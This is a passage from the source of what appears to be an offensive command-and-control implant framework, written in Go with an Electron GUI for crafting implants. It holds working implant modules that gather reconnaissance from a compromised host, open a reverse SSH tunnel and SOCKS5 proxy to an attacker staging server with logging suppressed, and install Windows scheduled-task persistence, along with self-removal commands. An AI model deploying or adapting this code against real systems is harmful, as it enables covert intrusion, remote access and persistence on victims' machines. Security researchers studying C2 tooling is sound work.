37 | 38 | //Pid 39 | cmd_path := "/bin/sh" 40 | cmd := exec.Command(cmd_path, "-c","echo $$") 41 | cmd.Stdout = &outbuf 42 | cmd.Stderr = &errbuf 43 | cmd.Run() 44 | cmd.Wait() 45 | pid = outbuf.String() 46 | stderr := errbuf.String() 47 | if stderr != "" { 48 | return true,"Error Getting OS:"+stderr 49 | } 50 | 51 | //OS 52 | cmd = exec.Command(cmd_path, "-c","uname") 53 | cmd.Stdout = &outbuf 54 | cmd.Stderr = &errbuf 55 | cmd.Run() 56 | cmd.Wait() 57 | os = "Compiled for linux: " + outbuf.String() 58 | stderr = errbuf.String() 59 | if stderr != "" { 60 | return true,"Error Getting OS:"+stderr 61 | } 62 | 63 | outbuf.Reset() 64 | errbuf.Reset() 65 | 66 | //OS Distro 67 | cmd = exec.Command(cmd_path, "-c","cat /etc/issue.net") 68 | cmd.Stdout = &outbuf 69 | cmd.Stderr = &errbuf 70 | cmd.Run() 71 | cmd.Wait() 72 | osv = outbuf.String() 73 | stderr = errbuf.String() 74 | if stderr != "" { 75 | return true,"Error Getting OS Version:"+stderr 76 | } 77 | 78 | outbuf.Reset() 79 | errbuf.Reset() 80 | 81 | //Arch 82 | cmd = exec.Command(cmd_path, "-c","uname -m") 83 | cmd.Stdout = &outbuf 84 | cmd.Stderr = &errbuf 85 | cmd.Run() 86 | cmd.Wait() 87 | arch = "Compiled for "+runtime.GOARCH+": "+ outbuf.String() 88 | stderr = errbuf.String() 89 | if stderr != "" { 90 | return true,"Error Getting Arch:"+stderr 91 | } 92 | 93 | outbuf.Reset() 94 | errbuf.Reset() 95 | 96 | //Hostname 97 | cmd = exec.Command(cmd_path, "-c","hostname") 98 | cmd.Stdout = &outbuf 99 | cmd.Stderr = &errbuf 100 | cmd.Run() 101 | cmd.Wait() 102 | hostname = outbuf.String() 103 | stderr = errbuf.String() 104 | if stderr != "" { 105 | return true,"Error Getting Hostname:"+stderr 106 | } 107 | 108 | outbuf.Reset() 109 | errbuf.Reset() 110 | 111 | //mac 112 | cmd = exec.Command(cmd_path, "-c","ip link | grep \"link/ether\" | cut -d \"/\" -f 2 | cut -d ' ' -f 2 | head -n 1") 113 | cmd.Stdout = &outbuf 114 | cmd.Stderr = &errbuf 115 | cmd.Run() 116 | cmd.Wait() 117 | mac = outbuf.String() 118 | stderr = errbuf.String() 119 | 120 | if stderr != "" { 121 | return true,"Error Getting MAC:"+stderr 122 | } 123 | 124 | outbuf.Reset() 125 | errbuf.Reset() 126 | 127 | //user 128 | cmd = exec.Command(cmd_path, "-c","whoami") 129 | cmd.Stdout = &outbuf 130 | cmd.Stderr = &errbuf 131 | cmd.Run() 132 | cmd.Wait() 133 | user = outbuf.String() 134 | stderr = errbuf.String() 135 | if stderr != "" { 136 | return true,"Error Getting User:"+stderr 137 | } 138 | 139 | outbuf.Reset() 140 | errbuf.Reset() 141 | 142 | //privileges 143 | if user == "root" { 144 | privileges = "root" 145 | }else{ 146 | privileges = "No root" 147 | } 148 | 149 | 150 | sysinfo := SysInfo{pid,os,osv,arch,hostname,mac,user,privileges} 151 | bufRP := new(bytes.Buffer) 152 | json.NewEncoder(bufRP).Encode(sysinfo) 153 | resultRP := bufRP.String() 154 | return false,resultRP 155 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/createforms/createImplant.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Craft Implants

6 |
7 |
8 |
9 | 10 |
11 | 12 |
13 | 14 | 15 |
16 | 17 |
18 | 19 | 20 |
21 |
22 | 23 | 24 |
25 | 26 | 27 | 31 | 32 |
33 | 34 | 35 | 36 | 40 | 41 |
42 | 43 | 44 | 48 | 49 |
50 | 51 | 52 | 53 | 54 | 64 | 65 |
66 | 67 |
68 | 69 |
70 |
71 |
72 |
73 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/sysinfo_no_native_windows.go: -------------------------------------------------------------------------------- 1 | // +build windows-sysnonative 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "os/exec" // requirement to execute commands against target system 9 | "bytes" 10 | "encoding/json" 11 | "runtime" 12 | ) 13 | 14 | type SysInfo struct { 15 | Pid string `json:"pid"` 16 | Arch string `json:"arch"` 17 | Os string `json:"os"` 18 | OsV string `json:"osv"` 19 | Hostname string `json:"hostname"` 20 | Mac string `json:"mac"` 21 | User string `json:"user"` 22 | Privileges string `json:"privileges"` 23 | 24 | } 25 | 26 | /* 27 | Description: Sysinfo No Native --> Windows. Retrieve Operating System key information from the foothold. 28 | Flow: 29 | A.Use OS commands to retrieve foothold key info 30 | */ 31 | func Sysinfo() (bool,string){ 32 | 33 | var( 34 | pid,os,osv,arch,hostname,mac,user,privileges string 35 | outbuf, errbuf bytes.Buffer 36 | ) 37 | 38 | //Pid 39 | cmd_path := "/bin/sh" 40 | cmd := exec.Command(cmd_path, "-c","echo $$") 41 | cmd.Stdout = &outbuf 42 | cmd.Stderr = &errbuf 43 | cmd.Run() 44 | cmd.Wait() 45 | pid = outbuf.String() 46 | stderr := errbuf.String() 47 | if stderr != "" { 48 | return true,"Error Getting OS:"+stderr 49 | } 50 | 51 | outbuf.Reset() 52 | errbuf.Reset() 53 | 54 | //Os 55 | cmd = exec.Command(cmd_path, "-c","uname") 56 | cmd.Stdout = &outbuf 57 | cmd.Stderr = &errbuf 58 | cmd.Run() 59 | cmd.Wait() 60 | os = "Compiled for windows: " + outbuf.String() 61 | stderr = errbuf.String() 62 | if stderr != "" { 63 | return true,"Error Getting OS:"+stderr 64 | } 65 | 66 | outbuf.Reset() 67 | errbuf.Reset() 68 | 69 | //OS Version 70 | cmd = exec.Command(cmd_path, "-c","cat /etc/issue.net") 71 | cmd.Stdout = &outbuf 72 | cmd.Stderr = &errbuf 73 | cmd.Run() 74 | cmd.Wait() 75 | osv = outbuf.String() 76 | stderr = errbuf.String() 77 | if stderr != "" { 78 | return true,"Error Getting OS Version:"+stderr 79 | } 80 | 81 | outbuf.Reset() 82 | errbuf.Reset() 83 | 84 | //Arch 85 | cmd = exec.Command(cmd_path, "-c","uname -m") 86 | cmd.Stdout = &outbuf 87 | cmd.Stderr = &errbuf 88 | cmd.Run() 89 | cmd.Wait() 90 | arch = "Compiled for "+runtime.GOARCH+": "+ outbuf.String() 91 | stderr = errbuf.String() 92 | if stderr != "" { 93 | return true,"Error Getting Arch:"+stderr 94 | } 95 | 96 | outbuf.Reset() 97 | errbuf.Reset() 98 | 99 | //Hostname 100 | cmd = exec.Command(cmd_path, "-c","hostname") 101 | cmd.Stdout = &outbuf 102 | cmd.Stderr = &errbuf 103 | cmd.Run() 104 | cmd.Wait() 105 | hostname = outbuf.String() 106 | stderr = errbuf.String() 107 | if stderr != "" { 108 | return true,"Error Getting Hostname:"+stderr 109 | } 110 | 111 | outbuf.Reset() 112 | errbuf.Reset() 113 | 114 | //mac 115 | cmd = exec.Command(cmd_path, "-c","ip link | grep \"link/ether\" | cut -d \"/\" -f 2 | cut -d ' ' -f 2 | head -n 1") 116 | cmd.Stdout = &outbuf 117 | cmd.Stderr = &errbuf 118 | cmd.Run() 119 | cmd.Wait() 120 | mac = outbuf.String() 121 | stderr = errbuf.String() 122 | 123 | if stderr != "" { 124 | return true,"Error Getting MAC:"+stderr 125 | } 126 | 127 | outbuf.Reset() 128 | errbuf.Reset() 129 | 130 | //user 131 | cmd = exec.Command(cmd_path, "-c","whoami") 132 | cmd.Stdout = &outbuf 133 | cmd.Stderr = &errbuf 134 | cmd.Run() 135 | cmd.Wait() 136 | user = outbuf.String() 137 | stderr = errbuf.String() 138 | if stderr != "" { 139 | return true,"Error Getting User:"+stderr 140 | } 141 | 142 | outbuf.Reset() 143 | errbuf.Reset() 144 | 145 | //privileges 146 | if user == "root" { 147 | privileges = "root" 148 | }else{ 149 | privileges = "No root" 150 | } 151 | 152 | 153 | sysinfo := SysInfo{pid,os,osv,arch,hostname,mac,user,privileges} 154 | bufRP := new(bytes.Buffer) 155 | json.NewEncoder(bufRP).Encode(sysinfo) 156 | resultRP := bufRP.String() 157 | return false,resultRP 158 | } -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/inject_rev_sshSOCKS5_trio.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin windows 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "io" 9 | "net" 10 | "golang.org/x/crypto/ssh" 11 | "github.com/armon/go-socks5" 12 | "time" 13 | "encoding/json" 14 | //"fmt" 15 | "log" 16 | "io/ioutil" 17 | ) 18 | 19 | /* JSON struct already declared in revSSHSHELL module 20 | This JSON Object definition is needed in some Implants Modules to decode parameters 21 | Hive will have the same definitions in: ./src/hive/hiveJobs.go 22 | 23 | type InjectRevSshShellBichito struct { 24 | Domain string `json:"domain"` 25 | Sshkey string `json:"sshkey"` 26 | Port string `json:"port"` 27 | User string `json:"user"` 28 | //Socks5Port string `json:"socks5port"` //This is the SOCKS5 port that will be opened in the implant device 29 | } 30 | */ 31 | 32 | /* 33 | Description: Inject Reverse Socks5 34 | Flow: 35 | A.Use golang ssh native library to spawn a ssh client that connects to a target staging 36 | A1.Use provided credentials (username and pem key), for the ssh connection 37 | B.This connection will create a listener in 2222 localport of target staging 38 | C.Open a SOCKS5 socket in bichito, then any remote receiving connection (remote SSH listen socket) will be TCP redireced to SOCKS5 39 | */ 40 | func RevSshSocks5(jsonparams string) (bool,string){ 41 | 42 | //Debug 43 | //fmt.Println(jsonparams) 44 | 45 | var revsshshellparams *InjectRevSshShellBichito 46 | errDaws := json.Unmarshal([]byte(jsonparams),&revsshshellparams) 47 | if errDaws != nil { 48 | return true,"Parameters JSON Decoding error:"+errDaws.Error() 49 | } 50 | 51 | auth, err := loadPrivateKey(revsshshellparams.Sshkey) 52 | if err != nil { 53 | return true,"Load Key String error" 54 | } 55 | 56 | config := &ssh.ClientConfig{ 57 | User: revsshshellparams.User, 58 | Auth: nil, 59 | HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error { 60 | return nil 61 | }, 62 | Timeout:time.Second * 1, 63 | } 64 | 65 | config.Auth = append(config.Auth, auth) 66 | 67 | // Dial the SSH connection 68 | sshConn, err := ssh.Dial("tcp", revsshshellparams.Domain+":"+revsshshellparams.Port, config) 69 | if err != nil { 70 | return true,"Error: error dialing remote host:"+err.Error() 71 | } 72 | 73 | 74 | // Listen on remote 75 | l, err := sshConn.Listen("tcp", "127.0.0.1:2222") 76 | if err != nil { 77 | return true,"Error: error listening on remote host:"+err.Error() 78 | } 79 | 80 | go listenSSHSocks5(sshConn,l)//,revsshshellparams.Socks5Port) 81 | 82 | return false,"Success: Rev SSH Socks5 Connected to Staging" 83 | } 84 | 85 | 86 | func listenSSHSocks5(sshconn *ssh.Client,l net.Listener){//,socks5port string){ 87 | 88 | defer sshconn.Close() 89 | 90 | //Make sure SOCKS5 don't log stuff 91 | logger := log.New(ioutil.Discard, "", log.LstdFlags) 92 | conf := &socks5.Config{Logger:logger} 93 | //conf := &socks5.Config{} 94 | server, err := socks5.New(conf) 95 | if err != nil { 96 | return 97 | } 98 | 99 | // Start accepting shell connections 100 | for { 101 | 102 | conn, err := l.Accept() 103 | if err != nil { 104 | //continue 105 | return 106 | } 107 | 108 | go server.ServeConn(conn) 109 | 110 | } 111 | } 112 | 113 | 114 | func redirectTCP(client net.Conn, remote net.Conn) { 115 | defer client.Close() 116 | chDone := make(chan bool) 117 | 118 | // Start remote -> local data transfer 119 | go func() { 120 | defer client.Close() 121 | defer remote.Close() 122 | 123 | _, err := io.Copy(client, remote) 124 | if err != nil { 125 | //log.Println(fmt.Sprintf("error while copy remote->local: %s", err)) 126 | } 127 | chDone <- true 128 | }() 129 | 130 | 131 | // Start local -> remote data transfer 132 | go func() { 133 | defer client.Close() 134 | defer remote.Close() 135 | 136 | _, err := io.Copy(remote, client) 137 | if err != nil { 138 | //log.Println(fmt.Sprintf("error while copy local->remote: %s", err)) 139 | } 140 | chDone <- true 141 | }() 142 | 143 | 144 | <-chDone 145 | 146 | } -------------------------------------------------------------------------------- /src/bichito/modules/persistence/windows_schtasks/windows_schtasks.go: -------------------------------------------------------------------------------- 1 | // +build 386 2 | 3 | package windows_schtasks 4 | 5 | import ( 6 | "bichito/modules/biterpreter" 7 | "encoding/json" 8 | "os/user" 9 | "unsafe" 10 | "os" 11 | "path/filepath" 12 | //Debug 13 | //"fmt" 14 | ) 15 | 16 | /* 17 | #cgo CXXFLAGS: -I"../../../../../winDependencies/includes/" 18 | #cgo LDFLAGS: -L"../../../../../winDependencies/libs/x86/" -ltaskschd -lcomsupp -lole32 -loleaut32 -static 19 | #include "windows_schtasks.h" 20 | #include 21 | */ 22 | import "C" 23 | 24 | 25 | type BiPersistenceWinSchtasks struct { 26 | Path string `json:"implantpath"` 27 | TaskName string `json:"taskname"` 28 | } 29 | 30 | var moduleParams *BiPersistenceWinSchtasks 31 | 32 | 33 | func AddPersistenceSchtasks(jsonPersistence string,blob string) (bool,string){ 34 | 35 | errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams) 36 | if errDaws != nil{ 37 | return true,"Error Decoding Persistence Module Params:" + errDaws.Error() 38 | } 39 | 40 | 41 | //Craft Userland Path: 42 | 43 | usr, err := user.Current() 44 | if err != nil { 45 | return true,"Error Getting User Context:" + err.Error() 46 | } 47 | 48 | userPath := usr.HomeDir +"\\"+ moduleParams.Path 49 | 50 | errUpload,stringErr := biterpreter.Upload(userPath,blob) 51 | if errUpload{ 52 | return true,"Error Uploading Implant on Persistence:" + stringErr 53 | } 54 | 55 | 56 | var ptrPath *C.char = C.CString(userPath) 57 | defer C.free(unsafe.Pointer(ptrPath)) 58 | 59 | var ptrName *C.char = C.CString(moduleParams.TaskName) 60 | defer C.free(unsafe.Pointer(ptrName)) 61 | 62 | ptrError := C.malloc(C.sizeof_char * 1024) 63 | defer C.free(unsafe.Pointer(ptrError)) 64 | 65 | error := C.SchtasksOnUserLogon((*C.char)(ptrPath),(*C.char)(ptrName),(*C.char)(ptrError)) 66 | 67 | errorString := C.GoString((*C.char)(ptrError)) 68 | if (error != 1){ 69 | 70 | return true,"Schtasks Error:" + string(errorString) 71 | } 72 | 73 | return false,"Persisted" 74 | } 75 | 76 | func CheckPersistenceSchtasks(jsonPersistence string) (bool,string){ 77 | 78 | errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams) 79 | if errDaws != nil{ 80 | return true,"Error Decoding Persistence Module Params:"+ errDaws.Error() 81 | } 82 | 83 | //Check if file on path exists 84 | usr, err := user.Current() 85 | if err != nil { 86 | return true,"Error Getting User Context:" + err.Error() 87 | } 88 | userPath := usr.HomeDir +"\\"+ moduleParams.Path 89 | 90 | errA,stringErr := biterpreter.Accesschk(userPath) 91 | if errA != false { 92 | return false, "Non Persisted"+stringErr 93 | } 94 | 95 | return false,"Persisted" 96 | } 97 | 98 | 99 | func RemovePersistenceSchtasks(jsonPersistence string) (bool,string){ 100 | 101 | errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams) 102 | if errDaws != nil{ 103 | return true,"Error Decoding Persistence Module Params:" + errDaws.Error() 104 | } 105 | 106 | var genError string 107 | usr, err := user.Current() 108 | if err != nil { 109 | return true,"Error Getting User Context:" + err.Error() 110 | } 111 | 112 | //Remove Task 113 | var ptrName *C.char = C.CString(moduleParams.TaskName) 114 | defer C.free(unsafe.Pointer(ptrName)) 115 | 116 | ptrError := C.malloc(C.sizeof_char * 1024) 117 | defer C.free(unsafe.Pointer(ptrError)) 118 | 119 | error := C.SchtasksDelete((*C.char)(ptrName),(*C.char)(ptrError)) 120 | 121 | errorString := C.GoString((*C.char)(ptrError)) 122 | 123 | //Remove Implant: spawn child process that kills father, wait and remove executable 124 | userPath := usr.HomeDir +"\\"+ moduleParams.Path 125 | 126 | execErr,stringerr := biterpreter.Exec("taskkill /f /im "+filepath.Base(os.Args[0])+" && ping 127.0.0.1 -n 6 > nul && del "+userPath) 127 | if execErr != false { 128 | genError = "File Removed Already" + stringerr 129 | } 130 | 131 | 132 | 133 | if (error != 1) || (execErr != false){ 134 | 135 | return true,"Schtasks Error:" + string(errorString) +"Wipe Error:" + genError 136 | } 137 | 138 | return false,"Persistence Removed" 139 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/console/console.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 |
7 |
8 | 9 | 144 | 145 | 146 | 147 | 148 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/sysinfo_native_linux.go: -------------------------------------------------------------------------------- 1 | // +build linux 2 | 3 | package biterpreter 4 | 5 | import ( 6 | 7 | "os" 8 | "os/user" 9 | "bytes" 10 | "encoding/json" 11 | "strconv" 12 | "syscall" 13 | "net" 14 | "strings" 15 | "runtime" 16 | ) 17 | 18 | /* 19 | This JSON Object definition is needed in some Implants Modules to decode parameters 20 | Hive will have the same definitions in: ./src/hive/hiveJobs.go 21 | */ 22 | type SysInfo struct { 23 | Pid string `json:"pid"` 24 | Arch string `json:"arch"` 25 | Os string `json:"os"` 26 | OsV string `json:"osv"` 27 | Hostname string `json:"hostname"` 28 | Mac string `json:"mac"` 29 | User string `json:"user"` 30 | Privileges string `json:"privileges"` 31 | 32 | } 33 | 34 | //Utility Function to transform int8 to strings 35 | func int8ToStr(arr []int8) string { 36 | b := make([]byte, 0, len(arr)) 37 | for _, v := range arr { 38 | if v == 0x00 { 39 | break 40 | } 41 | b = append(b, byte(v)) 42 | } 43 | return string(b) 44 | } 45 | 46 | 47 | /* 48 | Description: Sysinfo --> Linux. Retrieve Operating System key information from the foothold. 49 | Flow: 50 | A.Use Go native libraries and Linux syscalls to retrieve key foothold information 51 | */ 52 | func Sysinfo() (bool,string){ 53 | 54 | var( 55 | pid,oss,osv,arch,hostname,mac,actualUser,privileges string 56 | err error 57 | ) 58 | 59 | 60 | //Pid 61 | pid = strconv.Itoa(os.Getpid()) 62 | 63 | 64 | //OS Distro,version,arch 65 | var uname syscall.Utsname 66 | if err := syscall.Uname(&uname); err == nil { 67 | // extract members: 68 | type Utsname struct { 69 | Sysname [65]int8 70 | // Nodename [65]int8 71 | Release [65]int8 72 | Version [65]int8 73 | Machine [65]int8 74 | // Domainname [65]int8 75 | } 76 | 77 | oss = "Compiled for linux: " + int8ToStr(uname.Sysname[:]) 78 | osv = int8ToStr(uname.Release[:]) 79 | osv = osv + int8ToStr(uname.Version[:]) 80 | arch = "Compiled for "+runtime.GOARCH+": "+ int8ToStr(uname.Machine[:]) 81 | //hostname = int8ToStr(uname.Domainname[:]) 82 | } 83 | 84 | //Hostname 85 | hostname,err = os.Hostname() 86 | if err != nil { 87 | return true,"Error Getting Hostname:"+err.Error() 88 | } 89 | 90 | 91 | //Mac 92 | addrs, erri := net.InterfaceAddrs() 93 | 94 | if erri != nil { 95 | return true,"Error Getting Mac:"+erri.Error() 96 | } 97 | 98 | var currentIP, currentNetworkHardwareName string 99 | 100 | for _, address := range addrs { 101 | 102 | // check the address type and if it is not a loopback the display it 103 | // = GET LOCAL IP ADDRESS 104 | if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() { 105 | if ipnet.IP.To4() != nil { 106 | currentIP = ipnet.IP.String() 107 | } 108 | } 109 | } 110 | 111 | interfaces, _ := net.Interfaces() 112 | for _, interf := range interfaces { 113 | if addrs, err := interf.Addrs(); err == nil { 114 | for _, addr := range addrs { 115 | // only interested in the name with current IP address 116 | if strings.Contains(addr.String(), currentIP) { 117 | currentNetworkHardwareName = interf.Name 118 | } 119 | } 120 | } 121 | } 122 | 123 | netInterface, errm := net.InterfaceByName(currentNetworkHardwareName) 124 | if errm != nil { 125 | return true,"Error Getting Mac:"+errm.Error() 126 | } 127 | 128 | mac = netInterface.HardwareAddr.String() 129 | 130 | //User 131 | actualUserO,errU := user.Current() 132 | 133 | if errU != nil { 134 | return true,"Error Getting User:"+err.Error() 135 | } 136 | actualUser = actualUserO.Username 137 | 138 | //privileges 139 | if actualUser == "root" { 140 | privileges = "root" 141 | }else{ 142 | privileges = "No root" 143 | } 144 | 145 | sysinfo := SysInfo{pid,arch,oss,osv,hostname,mac,actualUser,privileges} 146 | bufRP := new(bytes.Buffer) 147 | json.NewEncoder(bufRP).Encode(sysinfo) 148 | resultRP := bufRP.String() 149 | return false,resultRP 150 | } -------------------------------------------------------------------------------- /src/bichito/modules/persistence/windows_schtasks/windows_schtasks_x64.go: -------------------------------------------------------------------------------- 1 | // +build amd64 2 | 3 | package windows_schtasks 4 | 5 | import ( 6 | "bichito/modules/biterpreter" 7 | "encoding/json" 8 | "os/user" 9 | "unsafe" 10 | "os" 11 | "path/filepath" 12 | //Debug 13 | //"fmt" 14 | ) 15 | 16 | /* 17 | #cgo CXXFLAGS: -I"../../../../../winDependencies/includes/" 18 | #cgo LDFLAGS: -L"../../../../../winDependencies/libs/x64/" -ltaskschd -lcomsupp -lole32 -loleaut32 -static 19 | #include "windows_schtasks.h" 20 | #include 21 | */ 22 | import "C" 23 | 24 | 25 | type BiPersistenceWinSchtasks struct { 26 | Path string `json:"implantpath"` 27 | TaskName string `json:"taskname"` 28 | } 29 | 30 | var moduleParams *BiPersistenceWinSchtasks 31 | 32 | 33 | func AddPersistenceSchtasks(jsonPersistence string,blob string) (bool,string){ 34 | 35 | errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams) 36 | if errDaws != nil{ 37 | return true,"Error Decoding Persistence Module Params:" + errDaws.Error() 38 | } 39 | 40 | 41 | //Craft Userland Path: 42 | 43 | usr, err := user.Current() 44 | if err != nil { 45 | return true,"Error Getting User Context:" + err.Error() 46 | } 47 | 48 | userPath := usr.HomeDir +"\\"+ moduleParams.Path 49 | 50 | errUpload,stringErr := biterpreter.Upload(userPath,blob) 51 | if errUpload{ 52 | return true,"Error Uploading Implant on Persistence:" + stringErr 53 | } 54 | 55 | 56 | var ptrPath *C.char = C.CString(userPath) 57 | defer C.free(unsafe.Pointer(ptrPath)) 58 | 59 | var ptrName *C.char = C.CString(moduleParams.TaskName) 60 | defer C.free(unsafe.Pointer(ptrName)) 61 | 62 | ptrError := C.malloc(C.sizeof_char * 1024) 63 | defer C.free(unsafe.Pointer(ptrError)) 64 | 65 | error := C.SchtasksOnUserLogon((*C.char)(ptrPath),(*C.char)(ptrName),(*C.char)(ptrError)) 66 | 67 | errorString := C.GoString((*C.char)(ptrError)) 68 | if (error != 1){ 69 | 70 | return true,"Schtasks Error:" + string(errorString) 71 | } 72 | 73 | return false,"Persisted" 74 | } 75 | 76 | func CheckPersistenceSchtasks(jsonPersistence string) (bool,string){ 77 | 78 | errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams) 79 | if errDaws != nil{ 80 | return true,"Error Decoding Persistence Module Params:"+ errDaws.Error() 81 | } 82 | 83 | //Check if file on path exists 84 | usr, err := user.Current() 85 | if err != nil { 86 | return true,"Error Getting User Context:" + err.Error() 87 | } 88 | userPath := usr.HomeDir +"\\"+ moduleParams.Path 89 | errA,stringErr := biterpreter.Accesschk(userPath) 90 | if errA != false { 91 | return false, "Non Persisted"+stringErr 92 | } 93 | 94 | return false,"Persisted" 95 | } 96 | 97 | 98 | func RemovePersistenceSchtasks(jsonPersistence string) (bool,string){ 99 | 100 | errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams) 101 | if errDaws != nil{ 102 | return true,"Error Decoding Persistence Module Params:" + errDaws.Error() 103 | } 104 | 105 | var genError string 106 | usr, err := user.Current() 107 | if err != nil { 108 | return true,"Error Getting User Context:" + err.Error() 109 | } 110 | 111 | 112 | 113 | //Remove Task 114 | var ptrName *C.char = C.CString(moduleParams.TaskName) 115 | defer C.free(unsafe.Pointer(ptrName)) 116 | 117 | ptrError := C.malloc(C.sizeof_char * 1024) 118 | defer C.free(unsafe.Pointer(ptrError)) 119 | 120 | error := C.SchtasksDelete((*C.char)(ptrName),(*C.char)(ptrError)) 121 | 122 | errorString := C.GoString((*C.char)(ptrError)) 123 | 124 | //Remove Implant: spawn child process that kills father, wait and remove executable 125 | userPath := usr.HomeDir +"\\"+ moduleParams.Path 126 | 127 | execErr,stringerr := biterpreter.Exec("taskkill /f /im "+filepath.Base(os.Args[0])+" && ping 127.0.0.1 -n 6 > nul && del "+userPath) 128 | if execErr != false { 129 | genError = "File Removed Already" + stringerr 130 | } 131 | 132 | /* 133 | wipeErr,stringerr := biterpreter.Wipe(userPath) 134 | if wipeErr != false { 135 | genError = "File Removed Already" + stringerr 136 | } 137 | */ 138 | 139 | if (error != 1) || (execErr != false){ 140 | 141 | return true,"Schtasks Error:" + string(errorString) +"Wipe Error:" + genError 142 | } 143 | 144 | return false,"Persistence Removed" 145 | } -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/sysinfo_native_darwin/sysinfo_native_darwin.go: -------------------------------------------------------------------------------- 1 | // +build darwin 2 | 3 | package sysinfo_native_darwin 4 | 5 | import ( 6 | 7 | "os" 8 | "os/user" 9 | "bytes" 10 | "encoding/json" 11 | "strconv" 12 | "net" 13 | "strings" 14 | "unsafe" 15 | "runtime" 16 | ) 17 | 18 | /* 19 | #cgo CFLAGS: -x objective-c 20 | #cgo LDFLAGS: -framework Foundation 21 | #import 22 | #import 23 | #include 24 | 25 | int arch(char * res){ 26 | int n; 27 | NXArchInfo *info = NXGetLocalArchInfo(); 28 | NSString *typeOfCpu = [NSString stringWithUTF8String:info->description]; 29 | char *archch = strdup([typeOfCpu UTF8String]); 30 | n = sprintf(res,"%s",archch); 31 | return n; 32 | } 33 | 34 | int osv(char * res) { 35 | int n; 36 | NSProcessInfo *pInfo = [NSProcessInfo processInfo]; 37 | NSString *version = [pInfo operatingSystemVersionString]; 38 | char *versionch = strdup([version UTF8String]); 39 | n = sprintf(res,"%s",versionch); 40 | return n; 41 | } 42 | */ 43 | import "C" 44 | 45 | /* 46 | This JSON Object definition is needed in some Implants Modules to decode parameters 47 | Hive will have the same definitions in: ./src/hive/hiveJobs.go 48 | */ 49 | type SysInfo struct { 50 | Pid string `json:"pid"` 51 | Arch string `json:"arch"` 52 | Os string `json:"os"` 53 | OsV string `json:"osv"` 54 | Hostname string `json:"hostname"` 55 | Mac string `json:"mac"` 56 | User string `json:"user"` 57 | Privileges string `json:"privileges"` 58 | 59 | } 60 | 61 | 62 | func SysinfoNativeDarwin() (bool,string){ 63 | 64 | var( 65 | pid,oss,osv,arch,hostname,mac,actualUser,privileges string 66 | err error 67 | ) 68 | 69 | 70 | //Pid 71 | pid = strconv.Itoa(os.Getpid()) 72 | 73 | 74 | //OS Distro,version,arch 75 | oss = "darwin" 76 | 77 | arch = "Compiled for "+runtime.GOARCH+": " 78 | ptrArch := C.malloc(C.sizeof_char * 1024) 79 | defer C.free(unsafe.Pointer(ptrArch)) 80 | sizeArch := C.arch((*C.char)(ptrArch)) 81 | bArch := C.GoBytes(ptrArch, sizeArch) 82 | arch = arch + string(bArch) 83 | 84 | 85 | ptrOsv := C.malloc(C.sizeof_char * 1024) 86 | defer C.free(unsafe.Pointer(ptrOsv)) 87 | sizeOsv := C.osv((*C.char)(ptrOsv)) 88 | bOsv := C.GoBytes(ptrOsv, sizeOsv) 89 | osv = string(bOsv) 90 | 91 | 92 | //Hostname 93 | hostname,err = os.Hostname() 94 | if err != nil { 95 | return true,"Error Getting Hostname:"+err.Error() 96 | } 97 | 98 | 99 | //Mac 100 | addrs, erri := net.InterfaceAddrs() 101 | 102 | if erri != nil { 103 | return true,"Error Getting Mac:"+erri.Error() 104 | } 105 | 106 | var currentIP, currentNetworkHardwareName string 107 | 108 | for _, address := range addrs { 109 | 110 | // check the address type and if it is not a loopback the display it 111 | // = GET LOCAL IP ADDRESS 112 | if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() { 113 | if ipnet.IP.To4() != nil { 114 | currentIP = ipnet.IP.String() 115 | } 116 | } 117 | } 118 | 119 | interfaces, _ := net.Interfaces() 120 | for _, interf := range interfaces { 121 | if addrs, err := interf.Addrs(); err == nil { 122 | for _, addr := range addrs { 123 | // only interested in the name with current IP address 124 | if strings.Contains(addr.String(), currentIP) { 125 | currentNetworkHardwareName = interf.Name 126 | } 127 | } 128 | } 129 | } 130 | 131 | netInterface, errm := net.InterfaceByName(currentNetworkHardwareName) 132 | if errm != nil { 133 | return true,"Error Getting Mac:"+errm.Error() 134 | } 135 | 136 | mac = netInterface.HardwareAddr.String() 137 | 138 | //User 139 | actualUserO,errU := user.Current() 140 | 141 | if errU != nil { 142 | return true,"Error Getting User:"+err.Error() 143 | } 144 | actualUser = actualUserO.Username 145 | 146 | //privileges 147 | if actualUser == "root" { 148 | privileges = "root" 149 | }else{ 150 | privileges = "No root" 151 | } 152 | 153 | sysinfo := SysInfo{pid,arch,oss,osv,hostname,mac,actualUser,privileges} 154 | bufRP := new(bytes.Buffer) 155 | json.NewEncoder(bufRP).Encode(sysinfo) 156 | resultRP := bufRP.String() 157 | return false,resultRP 158 | } -------------------------------------------------------------------------------- /src/bichito/modules/network/https_selfsigned_GO.go: -------------------------------------------------------------------------------- 1 | // +build selfsignedhttpsgo 2 | //// Listening Network Module for Redirectors /////////////////////////////////////////////////////////// 3 | // 4 | // Network Method: Egress to a https Golang Server redirector, using a self signed certificate.Implant will not check target TLS fingenprint. 5 | // 6 | // Warnings: Will work with MITM tls proxies, but server certificate is not signed. 7 | // 8 | // Fingenprint: GO-LANG Client TLS Fingerprint 9 | // 10 | // IOC Level: Medium 11 | // 12 | // 13 | /////////////////////////////////////////////////////////////////////////////////////////////////////// 14 | 15 | 16 | package network 17 | 18 | import ( 19 | 20 | "crypto/tls" 21 | "bytes" 22 | "net/http" 23 | "encoding/json" 24 | "io/ioutil" 25 | "time" 26 | "net" 27 | ) 28 | 29 